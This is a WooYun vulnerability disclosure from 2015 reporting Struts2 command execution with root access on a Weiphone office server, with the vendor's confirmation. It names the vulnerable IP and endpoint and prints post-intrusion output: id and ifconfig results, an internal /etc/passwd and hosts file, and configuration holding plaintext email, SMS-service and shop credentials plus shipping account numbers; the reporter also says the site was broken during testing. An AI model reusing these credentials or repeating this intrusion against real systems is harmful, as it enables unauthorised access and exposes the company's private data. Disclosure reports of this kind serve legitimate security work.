当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113254

漏洞标题:威锋网某站配置不当被Shell导致可泄露大量敏感数据

相关厂商:weiphone

漏洞作者: 炊烟

提交时间:2015-05-10 16:33

修复时间:2015-06-25 10:22

公开时间:2015-06-25 10:22

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-10: 细节已通知厂商并且等待厂商处理中
2015-05-11: 厂商已经确认,细节仅向厂商公开
2015-05-21: 细节向核心白帽子及相关领域专家公开
2015-05-31: 细节向普通白帽子公开
2015-06-10: 细节向实习白帽子公开
2015-06-25: 细节向公众公开

简要描述:

本来想深入的。。

详细说明:

绑定的域名

http://office.feng.com:8099/


struts2命令执行:http://113.108.53.7:8099/system/systemLogonAction.do
root权限,直接getshell





root密码




漏洞证明:

shell地址:

mask 区域
1.http://**.**.**/for.jsp_
2.http://**.**.**/js/js.jsp


站被我弄坏了。。你们自己删除吧
info

[/usr/local/software/tomcat/webapps/ROOT/]$ id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh
[/usr/local/software/tomcat/webapps/ROOT/]$ ifconfig
eth0 Link encap:Ethernet HWaddr 00:50:56:9A:D3:6A
inet addr:192.168.9.21 Bcast:192.168.9.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:fe9a:d36a/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:222501567 errors:0 dropped:0 overruns:0 frame:0
TX packets:85925803 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:37493228829 (34.9 GiB) TX bytes:29491862734 (27.4 GiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:177914494 errors:0 dropped:0 overruns:0 frame:0
TX packets:177914494 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:45454712043 (42.3 GiB) TX bytes:45454712043 (42.3 GiB)
<magento>
<userName>user123</userName>
<password>123456</password>
</magento>

<sms_webservice>
<sn>SDK-ADC-010-00020</sn>
<password>175721</password>
<serviceURL>http://117.79.237.3:8060/webservice.asmx</serviceURL>
</sms_webservice>

<emailConfig>
<smtpHost>mail.weiphone.com</smtpHost>
<emailFrom>仓库系统</emailFrom>
<emailTo>lwklwk1986@126.com</emailTo>
<userName>fengbuy@weiphone.com</userName>
<password>FengBuyadmin2013</password>
<subject>威锋网订单提示</subject>
</emailConfig>

<order_auto>
<order_interval>20</order_interval>
</order_auto>
<expressConfig>
<senderName>威锋网</senderName>
<magentoSenderName>威锋商城</magentoSenderName>
<senderAccountNo>275925233</senderAccountNo>
<senderSFAccountNo>7553356949</senderSFAccountNo>
<senderSFAccountNoNew>7552059551</senderSFAccountNoNew>
<senderFEDEXAccountNo>7 5 5 3 1 3 5 6 2 9</senderFEDEXAccountNo>
<phone>0755-26857667</phone>
<servicePhone>4006078090</servicePhone>
<region>广东省</region>
<city>深圳市</city>
<district>南山区</district>
<address_id>440305</address_id>
<address>深圳市南山区南海大道1057号科技二期B座403</address>
<postCode>518067</postCode>
</expressConfig>


部分dns信息

h.root-servers.net.	277875	IN	A	128.63.2.53
e.root-servers.net. 277875 IN A 192.203.230.10
a.root-servers.net. 277875 IN A 198.41.0.4
c.root-servers.net. 277875 IN A 192.33.4.12
d.root-servers.net. 277875 IN A 199.7.91.13
g.root-servers.net. 277875 IN A 192.112.36.4
f.root-servers.net. 277875 IN A 192.5.5.241
b.root-servers.net. 277875 IN A 192.228.79.201
e.root-servers.net. 277875 IN A 192.203.230.10
a.root-servers.net. 277875 IN A 198.41.0.4
c.root-servers.net. 277875 IN A 192.33.4.12
d.root-servers.net. 277875 IN A 199.7.91.13
g.root-servers.net. 277875 IN A 192.112.36.4
f.root-servers.net. 277875 IN A 192.5.5.241
b.root-servers.net. 277875 IN A 192.228.79.201
h.root-servers.net. 277875 IN A 128.63.2.53
a.root-servers.net. 277799 IN A 198.41.0.4
c.root-servers.net. 277799 IN A 192.33.4.12
d.root-servers.net. 277799 IN A 199.7.91.13
g.root-servers.net. 277799 IN A 192.112.36.4
f.root-servers.net. 277799 IN A 192.5.5.241
b.root-servers.net. 277799 IN A 192.228.79.201
h.root-servers.net. 277799 IN A 128.63.2.53
e.root-servers.net. 277799 IN A 192.203.230.10


192.168.9.30的部分信息

#127.0.0.1	localhost center.wefiler.com
127.0.1.1 dev-30.staff.weiphone.com dev-30
127.0.0.1 mx.phone.com localhost devapp.joyslink.com
192.168.9.30 devapp.joyslink.com localhost
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:105::/var/run/dbus:/bin/false whoopsie:x:103:106::/nonexistent:/bin/false landscape:x:104:109::/var/lib/landscape:/bin/false sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin jeff:x:1000:1000:jeff,,,:/home/jeff:/bin/bash mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false memcache:x:107:114:Memcached,,,:/nonexistent:/bin/false Debian-exim:x:108:115::/var/spool/exim4:/bin/false amavis:x:109:116:AMaViS system user,,,:/var/lib/amavis:/bin/sh cluebringer:x:110:117::/etc/cluebringer:/usr/sbin/nologin postfix:x:111:119::/var/spool/postfix:/bin/false clamav:x:112:121::/var/lib/clamav:/bin/false dovecot:x:113:122:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false dovenull:x:114:65534:Dovecot login user,,,:/nonexistent:/bin/false vmail:x:2000:2000::/var/vmail:/sbin/nologin iredadmin:x:2001:2001::/home/iredadmin:/sbin/nologin iredapd:x:2002:2002::/home/iredapd:/sbin/nologin zabbix:x:2003:2003::/home/zabbix:/bin/sh

修复方案:

就站点不用就关闭吧,或者禁止外网访问。

版权声明:转载请注明来源 炊烟@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-05-11 10:20

厂商回复:

谢谢提醒,修复中

最新状态:

暂无